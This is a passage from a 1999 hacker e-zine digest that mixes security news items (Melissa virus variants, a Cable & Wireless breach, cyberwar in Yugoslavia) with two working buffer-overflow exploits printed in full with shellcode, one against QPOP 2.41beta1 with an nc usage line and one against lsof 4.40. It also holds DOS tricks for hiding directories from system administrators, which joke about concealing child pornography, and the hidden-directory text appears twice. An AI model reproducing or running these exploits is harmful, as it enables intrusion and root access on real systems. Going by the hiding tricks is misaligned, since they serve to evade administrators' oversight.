emergencies.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

09.0 Over 24 Variants of Melissa Found With More to Come
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex
There are over 24 variations of the Melissa virus now in
existence. Melissa.U[Gen1] is the latest variant which
has infected over 40,000 hosts. Experts fear that many
more variations are on the horizon.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1017806,00.html?chkpt=zdnntop

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Melissa finds more fertile ground
By Jim Kerstetter, PC Week
October 22, 1999 1:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,1017806,00.html

IT managers wondering why variants of the Melissa virus are proliferating need only look to the
field of agriculture for the answer.

Farmers know that too much of the same crop is a recipe for disaster. A blight -- a virus -- can
wipe out an entire field in no time. Experts call it a monoculture.

And that's what the computing environment has become: a monoculture of Windows desktops,
connected by Visual Basic programming and Microsoft Office suite macro commands that are
easily exploited by willful programmers.

Melissa, which spawned in March, now circulates in about 24 versions. Two more Melissa
variants popped up this month; the latest, Melissa.U (Gen1), eluded the most sophisticated
anti-virus software. Experts warn many more will come.

Low barriers to entry
"Macro viruses such as Melissa are extremely easy to write," said Carey Nachenberg, chief
researcher at Symantec Corp.'s Antivirus Research Center, in Santa Monica, Calif. "Anybody
with a manual and a free afternoon could probably write one."


Melissa.U (Gen1) infected at least 40,000 nodes at five companies. The original Melissa grabbed
the top 50 addresses off a user's Outlook address book after an infected attachment was opened
and started a chain reaction that overloaded servers across the country. A variant, Melissa.U,
grabbed only four addresses. But its impact was more severe, wiping out important system
commands such as I/O.sys. Melissa.U (Gen1) is a further variation on that virus.

"This was the first of the Melissas to get past our virus software," said Alan Hamilton, IS manager
at a West Coast software company. "I guess our saving grace was, for once, people didn't open
it."


Just how Melissa.U (Gen1) was created is still a mystery. Most good anti-virus software can
catch variants of Melissa using two common detection methods.

The first is based on the virus' signature, a piece of code that is unique to that virus. Signature
recognition is easy for virus authors to avoid, however. Change a piece of the signature, without
actually changing the virus functions, and the signature recognition defense becomes moot. That's
why anti-virus software vendors constantly send out software updates.

The second method, called heuristics, isn't so easy to avoid. Heuristic software, which is in use by
most major anti-virus software vendors, looks for how a virus behaves -- for example, what
dynamic link libraries it writes to -- rather than its specific qualities. Heuristic software, for the
most part, has caught Melissa variants.

A novel twist
But Melissa.U (Gen1) didn't behave like the previous forms of Melissa. It used Messaging API
commands for opening Outlook address books differently than a typical Melissa variant. Experts
are speculating why this happened. It could be because the virus writers who set it loose were a
bit more creative than were the original writers, or anti-virus software never fully eradicated the
initial Melissa.U strain, according to experts.

And there's no reason that won't happen again. Macro commands, by their nature, are easy to
work with. Melissa, which feeds off the macros in Microsoft software, is easy to tinker with.

Probably the most disturbing thing about Melissa is its worm exploit -- that is, it has the ability to
proliferate more quickly. In addition, it can be easily mutated even by amateur virus writers.

Melissa hit the industry's most popular, yet vulnerable software -- Windows, which was designed
with connectivity, not security, in mind -- and it's only a matter of time before someone far more
skilled and sinister takes advantage of it again.

"What protects us right now," Symantec's Nachenberg said, "are people's ethics."

@HWA

10.0 Online Threats Labeled Cyberterrorism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
A man in Missouri has had his computer confiscated and
will have charges of making threats brought against him.
This after he made threats against students and
teachers at the Townsend's Hawthorne Brook Middle
School in Massachusetts. Somehow this was described
as a 'Cyberterrorist' act. (Threats on a playground are
just threats, threats on the internet are suddenly
cyberterroism.)

Associated Press - Via AltaVista
http://zip2.newsreal.com/cgi-bin/NewsService?osform_template=pages/altavistaStory&refresh=10800&ID=altavista&path=News/Story_1999_10_23.NRdb@2@23@3@63&headerID=1

Online Prowler Targets Mass. Teens
Source: Associated Press

BOSTON (AP) -- Officials say a 19-year-old quadriplegic from Missouri used an
Internet chat room to make "Columbine-like" threats to hurt students and teachers
at a Massachusetts middle school.

Massachusetts Attorney General Tom Reilly said Saturday that the paralyzed teen
-- whose name and hometown were not released -- made the threats using an
America Online chat room frequented by dozens of eighth-graders from
Townsend's Hawthorne Brook Middle School.

Authorities confiscated the Missouri teen-ager's computer on Friday and plan to
charge him with making threats and possibly other charges on Monday, Reilly
said.

He said the teen-ager had been chatting online with the Townsend students since
September, but midweek, the cyber-relationship turned terrifying. Reilly said the
man told several students he was in their community and he threatened to hurt
them, their teachers and their school.

The threats -- which included a list of teachers and students to be targeted -- was
an act of "cyberterrorism" that left the school shaken. It may have been a hoax,
but "the fear that was expressed by students, parents and teachers in this
community was very real,"
Reilly said.

Reilly said the students had thought the Missouri teen-ager was a peer and
included him in their conversations, revealing information about their town, their
school and themselves.

When the man allegedly directed some students to child pornography Web sites a
few days ago, some of the children told their parents, who then called police.

Townsend Superintendent of Schools James McCormick said someone from the
community also received a suspicious phone call that made references to the April
20 shootings at Columbine High School in Littleton, Colo., where two students
shot and killed 12 students, a teacher and themselves.

Bomb-sniffing dogs searched the middle school on Thursday, and students' bags
and backpacks were checked, but nothing suspicious was found and school was
declared safe, McCormick said.

On Friday, authorities converged on the suspect's home, where he lives with his
parents, and confiscated his computer equipment.

Reilly said the teen-ager -- paralyzed from the neck down by a high school car
crash -- admitted communicating with the Massachusetts students.

Publication date: Oct 23
© 1999, NewsReal, Inc.


11.0 QPOP 2.41beta1 exploit (linux x86) by mastoras
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
* QPOP 2.41beta1 exploit (linux x86) by mastoras
* Some code ripped from "mount" exploit by Bloodmask and Vio
* Assembly code changed so it is not affected by tolower() function.
*
* this one sucks (too), but works :>
* (./qpop 997 4000; cat) | nc your_victim 110
*
* 28 Jun 1998
* mastoras@hack.gr http://www.hack.gr/users/mastoras
* Mastoras Wins! Fatality!
*/


#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 4000

u_long get_esp()
{
__asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x26\x5e\x8d\x1e\x89\x5e\x1b\x31\xed\x89\x6e\x17\x89\x6e\x1f"
"\xb8\x1b\x76\x34\x12\x35\x10\x76\x34\x12\x8d\x6e\x1b\x89\xe9\x89"
"\xea\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd5\xff\xff\xff"
"/////////////////bin/sh";

unsigned long *addr_ptr = NULL;
unsigned int ret_address;
char *buff = NULL;
char *ptr = NULL;
int BUFFER_SIZE = 997;
int ofs = DEFAULT_OFFSET;
int nops = (300/4);
int i;

if (argc>1) BUFFER_SIZE = atoi(argv[1]);
if (argc>2) ofs = atoi(argv[2]);

buff = malloc(4096);
if(!buff) {
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;

ret_address = get_esp() - ofs;

for(i=0;i < (nops);i++)
*(addr_ptr++) = ret_address;

ptr = (char *)addr_ptr;
*ptr = 0;

fprintf(stderr, "length %d+%d+%d=%d, address=%x\n", BUFFER_SIZE,strlen(execshell),nops,
BUFFER_SIZE+strlen(execshell)+nops, ret_address);

printf("%s\n",buff);
return 0;
}



@HWA

12.0 ls0f.c Vulnerable: linux machines running lsof 4.40
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
* ls0f.c (c) 1999 Subterrain Security
* Written by bind - 1999
*
* Vulnerable: linux machines running lsof 4.40
*
* Cheers to xdr & cripto...
*
* *Affected*
* [ SuSE 6.0 + 5.3 ]
* [ Debian 2.0 ]
* [ Redhat 5.2 ]
*
*/


#include <stdio.h>
#include <strings.h>

#define LSOF "/usr/sbin/lsof"

char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{ __asm__("movl %esp, %eax"); }

int main(int argc, char **argv)
{
char code[2000];
char ret[28];
int offset, i;
int len = strlen(shellcode);

if(argc > 1) offset = atoi(argv[1]);

for(i = 0;i <= 28;i += 4)
*(long *)&ret[i] = (unsigned long) get_sp() - offset;

memset(code, 0x90, 2000);
memcpy(code+(2000 - len), shellcode, len);

setenv("CODE", code, 1);
execl(LSOF,"lsof","-u",ret,NULL);
}


@HWA

13.0 Free phone calls over the internet in the US
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by sAs-

There is a new company offering free dialing using internet phone technology to
make calls over the internet within the US. The catch: you have to be a US citizen
(or at least provide US address details) and you have to fill out a standard
marketting questionaire and include your email address. I filled out the form with
false info and was allowed into the dialpad system. You will be asked to allow the
site to install a new java applet on your computer, allow it to do so and the the
dialpad applet will be installed automatically in Netscape (or MSIE) 4.5 / 5.0 or
higher. From there on you have the dialpad and using a headset/with mic can dialout
to any destination in the U.S. Have fun!


http://www.dialpad.com/


@HWA

14.0 Are You a Cyberspace Addict?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench
Internet-Computer Addiction Services is a Redmond WA
counseling center that specializes in treating people
who are addicted to being online. The founders Jay
Parker, Hilarie Cash and others feel that online addiction
is just as powerful as gambling, alcohol or drugs.

Seattle Times
http://www.seattletimes.com/news/local/html98/adix_19991024.html

Posted at 01:22 a.m. PDT; Sunday, October 24, 1999

Center offers treatment for growing
number of cyberspace addicts



by Ian Ith
Seattle Times Eastside bureau

A 45-year-old corporate
chief executive in Seattle
finds himself locking
himself in his office,
holding all his calls and
surfing the Internet for
pornography for hours on
end.

A University of
Washington student flunks
out because he stays up all
night - every night -
playing online fantasy role-playing adventure games.

A homemaker turns on the computer when the kids go to school.
When they come home, she's still there, talking about sex with
total strangers in an online chat room.

"This is really happening, and it's pretty powerful stuff," said Jay
Parker, an Eastside addiction counselor. "This does impact
people's lives. They need to start figuring out ways to live with
their computers and make it a healthy part of their lives."


So Parker has teamed up with a colleague, psychologist Hilarie
Cash, in opening Internet-Computer Addiction Services, a
Redmond counseling center that specializes in treating people who
just can't kick the online habit.

And while some scholars say they doubt that computer obsession
rises to the level of a true addiction on par with alcohol or drugs,
Cash, Parker and a contingent of highly respected colleagues say
it's just as harmful as gambling addiction, and just as costly.

Some estimate that at least 10 percent of heavy Internet surfers
are psychologically dependent on cyberspace and need
professional help.

"It's a growing thing," said Maressa Hecht Orzack, a Boston
clinical psychologist and professor at the Harvard Medical School
who is considered the leading expert on computer addiction. "It's
a very isolating experience for many people. People who get into
this situation will have tried to stop. But they tend to do it
compulsively and they can't stop it."


Parker and Cash collaborated after they met at a conference and
debated the various methods of treating computer addiction. Both
had seen a surge in the number of clients in their regular practices
who were finding the Internet affecting their lives.

But the idea of computer addiction is so new that there aren't any
solid medical studies to support one method or another. In fact,
the jury is still out on whether someone can actually be addicted
to a computer or whether computer use is just a symptom of
some other trouble.

"There's no question that there's some people who are spiraling
out of control,"
said Malcolm Parks, an assistant vice provost for
research at the University of Washington. "The question, to me as
a researcher, is what would they be doing if they didn't have the
Internet. Would they spiral out of control in some other way?

"
It's a reach to say the technology is the cause of the addiction,"
he said. "
Why not help them deal with the underlying issues?"

But Cash and Parker say they have seen too many Internet
tragedies to dismiss it.

"
The social consequences are enormous," said Cash, who has a
doctorate in psychology and has treated patients for two decades.
"
When you neglect your spouse and develop serious marital
problems, when your job is neglected, when your kids are
neglected, these are serious consequences."

The counselors acknowledge that there's no consensus on how to
treat the problem. So they plan to conduct a scientific study of
various methods.

Parker thinks 12-step programs, similar to Alcoholics
Anonymous, is the most effective. Cash will focus on a more
traditional counseling approach. Which technique clients will use
will depend on their individual circumstances.

While temporarily abstaining from computer use is likely to be
necessary to break the habit, both counselors acknowledge that
computers are too ingrained in our world for users to become
cyber-teetotalers.

"
The goal is to have them use the computer the same way a food
addict still needs to eat," Parker said. "Our first goal is to get them
off the Internet, then our second goal is to address the underlying
issues."

And, the counselors hope, they can learn to be like the millions of
Web surfers who don't let it rule their lives.

"
They find a way to balance it in their lives," Cash said. "That's the
difference between someone who becomes an addict and those
who don't.

"But there really are people who don't have any apparent
pre-existing problems, and they get hooked. It's something we
don't fully understand. But it happens. It's a technology that is just
powerful."


@HWA

15.0 Congressman Lobbies IETF For Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion
Representative Bob Barr (R-Georgia) has sent a letter to
the chairman of the Internet Engineering Task Force
supporting freedom and privacy. He urged the IETF not
to assist law enforcement by providing a surveillance
architecture in the new Internet technology. The FBI
has requested that such technology be built into the
new technology to aid in legal wiretaps.

Wired
http://www.wired.com/news/politics/0,1283,32100,00.html

'Don't Help the Snoops' by Declan McCullagh

10:45 a.m. 25.Oct.99.PDT The Internet's standards body should not craft
technology to aid government surveillance, a prominent conservative
congressman says.

Representative Bob Barr (R-Georgia) said that there is no reason for the
Internet Engineering Task Force to support wiretapping in the next
generation of protocols and that doing so would be "dangerous."

"For the sake of protecting freedom, commerce, and privacy on the
Internet, I urge you to draw the line firmly and early, by immediately
rejecting any attempts to force a cumbersome, expensive, and dangerous
surveillance architecture on the Internet,"
Barr wrote in a letter to IETF
chairman Fred Baker.

Next month, the IETF will decide whether to support government
surveillance in the protocols that computers connected to the Internet use
to communicate. The FBI has said those standards should support lawful
wiretaps.

Barr predicted that if the IETF complies with the FBI's wishes, privacy
would be endangered online through back doors in products, law enforcement
would be emboldened and demand even more access, and the costs to
consumers would rise.

Since his election in 1994, Barr has become a prominent privacy advocate
in Congress, frequently siding with the ACLU and denouncing expansions of
government power such as FBI demands for "roving" wiretaps. Best known for
demanding Clinton's impeachment even before the Lewinsky scandal, Barr has
also fought against same-sex marriages and drug legalization.

While Barr's letter is intended to signal that Congress is interested in
what has been an internal IETF debate -- and may be the first time that a
legislator has ever weighed in on one -- it could have limited impact.

The IETF is an international standards-setting body that has long prided
itself on being above parochial, national concerns.

Then again, say law enforcement agents, nations have required their
telephone companies to support wiretapping, and may require Internet
companies to buy snoopable products as more communication takes place
online.

"I'm not aware of any country that does not allow for the use of
electronic surveillance,"
an FBI spokesman told Wired News. "This is an
issue that has no country bounds."


In discussions on an internal IETF mailing list, some proponents of
readily-available wiretapping have said that a 1994 law called the
Communications Assistance to Law Enforcement Act, or CALEA, may require
Net-telephony companies to support surveillance.

"In my opinion, Internet telephony in its current form falls far short of
the statutory definitions in CALEA,"
Barr said. "Furthermore, based on
Congress' intent to do nothing more than maintain the status quo by
enacting CALEA, it is questionable whether Internet telephony could ever
be appropriately included under the Act's mandates."


Barr indicated he would consider introducing legislation to block the
Clinton administration from making any such demands.

@HWA


16.0 The King Of Hidden Directories by Zym0t1c
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: This works in *NIX as well, it has been used by warez groups for years
to hide warez sites on public servers, but this info is still useful for the
average joe that wants to hide stuff from over zealous sysadmins - Ed


Contributed by Zym0t1c

The KING of Hidden Directories

Oct, 18th 1999 - ... Screwing around at school...
If our sysops (relying on NT4) detect any hidden directory, not owned
by them, they simply delete it. "They don't like anyone having secrets,"
was their reason... Sympathetic he? So, I was playing with the little
hidden directories trick I've read about some time ago (downloaded from
The HackerZ Hideout, http://www.hackersclub.com/km,

called 'REAL Hidden Directories' - DOS Trick by kM & mR.dISCO)

The following lines are taken from that file.
/******************************** CUT HERE ********************************/

'... In DOS there are 256 characters (i.e. letters, numbers and symbols
numbered 0-255). Look in the back of any DOS manual to find these. When you
hold down the ALT key and type the ASCII code from the number pad it will print
it to the screen. For example ALT (155) is ¢ and ALT (129) is ü. However, ALT
(255) is the NULL character (it is true nothingness). If you create a directory
using ALT (255), it will appear to have no name, but... =)...'

/******************************** CUT HERE ********************************/



So, right now everyone can create a *REAL* hidden directory... :)
I suggest every newbie (what the hell! I suggest everybody! :)) reading
that article since it's so simple and useful... Just grab it at
'http://hackersclub.com/km/newbies/dostrick.txt'. (Appended to this article - Ed)

Conclusion of today's classes: I've found one directory which is totally
hidden! You know that when you create a subdirectory, assuming you use a DOS
shell, two directories are created, named '.' and '..'. You can check this by
looking at the date and time of creation. The . directory is the current one
and the .. directory is used for going one up. So, what if one created a
directory called '..ALT (255)', i.e. '.. '? When you check it, you receive a
second .. directory. When the sysops see this, they will get suspicious thinking
they've never seen this in their entire lives! A directory with two .. directories!
:)) Am I going crazy? Then, going to explorer, I saw that the directory was not
listed, although it wasn't hidden. In DOS, it was listed like any regular ..
direcory. So, using the attrib +h ..ALT (255), it dissapeared in DOS.
Using the Show all files (hidden also) option in explorer, it still wasn't
listed. Found it! The KING of hidden directories in DOS, Win95 OSR1,
NT3.51 and NT4!!! (and UNIX - Ed)

The negative part is that you can find the directory using the find command,
hidden or not. But, you must admit that a sysop must really know what he is
looking for, going through all that trouble just for finding that one
directory... Also, when you deltree the directory above (where this hidden
directory was created in), it also is removed.

So, when you use this trick, use it in a directory where the sysops won't
think to find anything. Let's say... \%systemdrive%\system32\ or something
similar (if you've got write access).

Remarks:

o I've tried many directories (the class was really boring) using one point
with ALT (255), two points and many many other combinations, but this one
was the only *REAL* hidden directory...

o Create it under the root directory and hide it for a little fun... If
the sysops don't know much of the ASCII table and the combinations used by
DOS commands (use of asterisks, ...), they won't be able to delete it easy.
BTW: NT 4 doesn't recognize the deltree command.
Everyone knows this, but just in case you don't: why don't you create a
whole tree of such directories under the root? :)

o Hide it always (attrib +h ..ALT (255)), so the directorie becomes never
listed and keep your files away from those ?*%!!!%ckers. :))

o I tested it also under Win98 and the directory was listed as a ~1
directory, both visible under explorer and DOS... Win95 OSR2 and 98 SE
will also list it (I think). So, this trick is dead using these versions
and probably the next generation of Microsoft OS'ses.

o Still, you must admit, this one is nice, isn't it? :))

Zym0t1c,



@HWA

17.0 The Hidden Directories text referred to in 16.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

REAL Hidden Directories
DOS Trick by kM & mR.dISCO
03/25/97 (screwing around at work)
- This is old but newbies need to know about it -
Another Original from the HackerZ Hideout
www.hackersclub.com/km
======================
OK here is a trick that you can do with your DOS/Windows3.x and Windows 95 machine that works.
If you use Windows NT 3.51/NT4.0 or Win95 OSR2 w/FAT 32 this little trick doesn't work. It
only works on people who don't know DOS and the ASCII table. Use at your own risk!
If you're trying to hide kiddie porn from the feds and get busted its not our fault!

Maybe we will do another revision of this that will be more malicious to the end user with this
hack. I'm sure if you play with it long enough and read your DOS manual maybe you can guess
what we are thinking.

Send us your own ideas about this trick...we will publish them here if they are good.
======================

What it Does:
This trick can be used to hide data on a computer in a directory. Unless you know how to
change to the directory manually you won't be able to access it. (meaning Windows File
Manager and Windows Explorer although it sees it, it can't access it).

Why it Works:
In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look
in the back of any DOS manual to find these. When you hold down the ALT key and type the
ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢
and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness).
If you create a directory using ALT (255), it will appear to have no name, but...=)

NOTE: You will not have the access to the full character set unless ANSI is loaded.
Look in your DOS book, or in WIN 95 help to do this.

How to Do It:

  
Goto DOS and do these commands
C:
cd\
md {hold ALT (on your numberpad only)} 255 <- this is an ASCII NULL Character
cd ALT 255
and put something in there

-=> If you want to be cruel and evil do something stupid like "ALT-255xxxpics" on a computer
at a local CompUsa. See if the idiots could delete the directory or see if there are
actual XXX Pics in there.


Limitations:

This can only be created in DOS or a DOS window. If you create this in explorer or file
manager it will let you access the directory.

What the Average User Sees:
To test it...go into windows File Manager or Explorer...you will see a C:\_ directory...when
you double click it will say :
" c:\_ not accessible.
This Folder was moved or removed"

Heheh...If you really want to be bad ATTRIB the directory +H so no one in DOS can see it.


Updated on 6/30/97...
An Email I received by Gizmo

Subject: Limitations using 255
Date: Mon, 30 Jun 1997 01:01:18 -0500

I was just messing around and found the neat dos trick.
Not that it really matters but another limitation of the trick is that
if the "special directory" is a subdirectory then you can just use "deltree" on the parent
directory.

Here's an even simpler method...
Say you make a directory called "trick" inserting the null character in front.
Just type "deltree *trick". And it's gone!

===============================================================================================

Why should I use this?
- Good for kids who want to hide porn from mommy and daddy!
- If your a tech support person you know how lame users can be. This is handy for making
backups of configurations and covering your ass.
- Its probably also good to pull batch file pranks and such on unsuspecting lamers that use
the 16 bit file manager in Windows 95. (that one was for you Wyle)

Its a small hack...but its for newbies who need to learn even the littlest of things count.

If you have a small hack you think newbies should know please send it to
km@hackersclub.com

REAL Hidden Directories
DOS Trick by kM & mR.dISCO
03/25/97 (screwing around at work)
- This is old but newbies need to know about it -
Another Original from the HackerZ Hideout
www.hackersclub.com/km
======================
OK here is a trick that you can do with your DOS/Windows3.x and Windows 95 machine that works.
If you use Windows NT 3.51/NT4.0 or Win95 OSR2 w/FAT 32 this little trick doesn't work. It
only works on people who don't know DOS and the ASCII table. Use at your own risk!
If you're trying to hide kiddie porn from the feds and get busted its not our fault!

Maybe we will do another revision of this that will be more malicious to the end user with this
hack. I'm sure if you play with it long enough and read your DOS manual maybe you can guess
what we are thinking.

Send us your own ideas about this trick...we will publish them here if they are good.
======================

What it Does:
This trick can be used to hide data on a computer in a directory. Unless you know how to
change to the directory manually you won't be able to access it. (meaning Windows File
Manager and Windows Explorer although it sees it, it can't access it).

Why it Works:
In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look
in the back of any DOS manual to find these. When you hold down the ALT key and type the
ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢
and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness).
If you create a directory using ALT (255), it will appear to have no name, but...=)

NOTE: You will not have the access to the full character set unless ANSI is loaded.
Look in your DOS book, or in WIN 95 help to do this.

How to Do It:
Goto DOS and do these commands
C:
cd\
md {hold ALT (on your numberpad only)} 255 <- this is an ASCII NULL Character
cd ALT 255
and put something in there

-=> If you want to be cruel and evil do something stupid like "ALT-255xxxpics" on a computer
at a local CompUsa. See if the idiots could delete the directory or see if there are
actual XXX Pics in there.


Limitations:

This can only be created in DOS or a DOS window. If you create this in explorer or file
manager it will let you access the directory.

What the Average User Sees:
To test it...go into windows File Manager or Explorer...you will see a C:\_ directory...when
you double click it will say :
" c:\_ not accessible.
This Folder was moved or removed"

Heheh...If you really want to be bad ATTRIB the directory +H so no one in DOS can see it.


Updated on 6/30/97...
An Email I received by Gizmo

Subject: Limitations using 255
Date: Mon, 30 Jun 1997 01:01:18 -0500

I was just messing around and found the neat dos trick.
Not that it really matters but another limitation of the trick is that
if the "special directory" is a subdirectory then you can just use "deltree" on the parent
directory.

Here's an even simpler method...
Say you make a directory called "trick" inserting the null character in front.
Just type "deltree *trick". And it's gone!

===============================================================================================

Why should I use this?
- Good for kids who want to hide porn from mommy and daddy!
- If your a tech support person you know how lame users can be. This is handy for making
backups of configurations and covering your ass.
- Its probably also good to pull batch file pranks and such on unsuspecting lamers that use
the 16 bit file manager in Windows 95. (that one was for you Wyle)

Its a small hack...but its for newbies who need to learn even the littlest of things count.

If you have a small hack you think newbies should know please send it to
km@hackersclub.com

@HWA

18.0 Cable + Wireless Security Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lady Sharrow
Cable & Wireless Communications, a major ISP in
England, has had its security breached. A database
containing the personal information of 150,000 users
was reportedly compromised. The database included
e-mail addresses, passwords and telephone numbers.
Cable & Wireless is unsure how the breach occurred but
is investigating.

UK Telegraph
http://www.telegraph.co.uk/et?ac=001576828917683&rtmo=qudtuRt9&atmo=9999LpL9&pg=/et/99/10/25/nhack25.html

Hacker spins a worldwide web of security fears
By Sally Pook




CONCERNS about the security of the internet deepened yesterday after a
hacker claimed to have broken into a database containing the personal details
of more than 150,000 users.

Cable & Wireless Communications promised an immediate investigation into
what appeared to be a "very serious breach of security".

The hacker claimed to have used the information, including e-mail addresses,
passwords and telephone numbers, to break into the web sites of 100 users
yesterday. He said he did it to expose poor security at Cable & Wireless
Communications, a subsidiary of the telecoms group.

Clifford Longley, a columnist with The Daily Telegraph, found all his files had
disappeared from his web site. He said: "All my articles had been deleted. I
rang a helpline and the person on the telephone just said 'Oh my God'."
Mr
Longley was greeted by a notice on his web site from the hacker saying:
"Looking for your homepage? It has been taken off the server. Nothing
personal but this has been done to expose Cable & Wireless's poor security."


The hacker claimed he had broken into a "normal" internet site containing
details of more than 150,000 customers and said he had revealed the web
address. Yesterday, a spokesman for Cable & Wireless Communications
said: "We don't know why this has happened or how but we will investigate it
as soon as possible. Customers' details are kept on an internal system, but if
these claims are true, we will have to look at how these details got on to the
internet."


Two months ago, Hotmail, one of the biggest e-mail providers, was closed by
its operator Microsoft after a security breach allowed anyone to read
subscribers' messages.

@HWA

19.0 Yugo Cyber War Not As Widespread As First Thought
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Recent statements by high level military officials
regarding the use of electronic techniques during the US
- Yugoslavian war have increased conjecture as to what
actually occurred. Rumors have spread about everything
from implanting viruses to draining bank accounts.
However, according to the commander of U.S. air forces
in Europe cyber attacks were mainly focused on military
air defense systems.
This article goes on to explore the legal aspects of
attacks on other countries computer systems and claims
that Operation Uphold Democracy in Haiti in 1994 was
the first American penetration of foreign computer
networks.

Washington Post
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm



The Cyber Bomb in Yugoslavia


By William M. Arkin
Special to washingtonpost.com
Monday, October 25, 1999

Gen. Henry Shelton, chairman of the Joint
Chiefs of Staff, told reporters Oct. 7 that the United States waged
information warfare as part of the NATO bombing campaign earlier this
year. His confirmation fueled media conjecture that American hackers
plundered Yugoslav bank accounts and took other Clancy-esque actions
against Slobodan Milosevic's networks and infrastructure.

But I have learned from high-level Defense Department sources that the
U.S. did not penetrate any banking networks. What is more, the
Pentagon's own top legal office believes that such attacks may be
unlawful.

Operations against Yugoslav computer systems were focused on military
air defense systems. Gen. John Jumper, commander of U.S. air forces in
Europe, confirmed this to Aviation Week and Space Technology in
August.

Concerns about international legal constraints on electronic information
warfare have so far deterred American government hackers from
exercising their full capabilities. Moreover, the Pentagon says it is
hampered by a lack of a national information operations vision and
strategy. "The conduct of an integrated campaign was delayed by the lack
of both advance planning and strategic guidance defining key objectives,"

its Kosovo after-action review released this month says.

Have Your Lawyer Call My General

While bombs were falling in Yugoslavia, the Pentagon Office of General
Counsel finished a 50-page internal "Assessment of International Legal
Issues in Information Operations."
Though it notes that it is "by no means
clear what information operations (IO) techniques will end up being
considered to be 'weapons'"
in the eyes of the international community, the
traditional law of war applies to military-inspired "computer network
attack."


"Offensive IO are governed by the same legal principles" that govern the
use of force, according to retired Marine Corps lawyer Walter "Gary"
Sharp, Shelton's former deputy legal counsel responsible for information
war. These include maintaining the distinction between combatants and
noncombatants, and the doctrine of military necessity. "What we cannot
do kinetically we cannot do electronically,"
Sharp says.

Accordingly, the Pentagon's May assessment states that "stock
exchanges, banking systems, universities, and similar civilian infrastructures
may not be attacked simply because a belligerent has the ability to do so."

Under the principle of military necessity, to go after Milosevic's and his
cronies' bank accounts, whether with bombs or bits, requires that "the
attacking force can demonstrate that a definite military advantage is
expected from the attack."


Noting the "current formative period" of information warfare, the Pentagon
appraisal warns of the possibility that "efforts will be made to restrict or
prohibit information operations by legal means."


Your Wish is Our Command

Knowledgeable military sources say that Yugoslavia is not the first
American penetration of foreign computer networks. Computers were
broken into and exploited during Operation Uphold Democracy in Haiti in
1994, according to sources. President Clinton personally approved the
operation.

Since Haiti, these same sources said, a number of "relatively low key"
computer exploitations have accompanied other peacekeeping operations.
Many of these have been little more than high-tech intelligence collection
missions. In many other cases, says one insider, the Joint Staff office of
"special technical operations" prepared "approval packages" for the
Secretary of Defense and the President, but the "process took so long the
operations were overtaken by events and we didn't engage in them."


System Access To What End

When Yugoslavia turned into a hot war, air planners at U.S. European
headquarters worked in San Antonio with the Joint Command and
Control Warfare Center (JC2WC--known as "jake-wick" in the military)
to devise a scheme to insert false messages and targets into the centralized
air defense command network. But political hesitations in the approval
process stood in the way of the operation beginning with the opening
bombing salvos on March 24.

A Top Secret U.S.-only operation to penetrate the Yugoslav air defense
system was approved soon after the bombing began, Air Force sources
say. Here would be the first test of a new weapon and capability in
combat. At the same time though, NATO was surprised when Yugoslav
radar operators did not turn on their systems. Evidently learning from Iraq,
they kept a low "electronic profile," thus thwarting the traditional electronic
attack with anti-radiation missiles and jammers. This was fortunate for the
cyber-warriors, for it made a computer penetration all the more important
if it could confuse or disable the network of surface-to-air missiles.

But by the time all of the pieces of the information war were in place,
enough physical damage had been done to Yugoslav bunkers and
command lines, it became difficult to isolate and assess the impact of the
cyber attack.

For Gary Sharp and other legal specialists in this burgeoning field of
information warfare, Yugoslavia merely stands as another demonstration
that computer network attack will eventually become an integral part of
the way warfare is waged. "We have not fully realized the breadth of the
capabilities and the potential,"
Sharp says.

The General Counsel report agrees. It concludes that there are "no
show-stoppers in international law"
for the types of information operations
"as now contemplated" by the Pentagon as long as existing legal
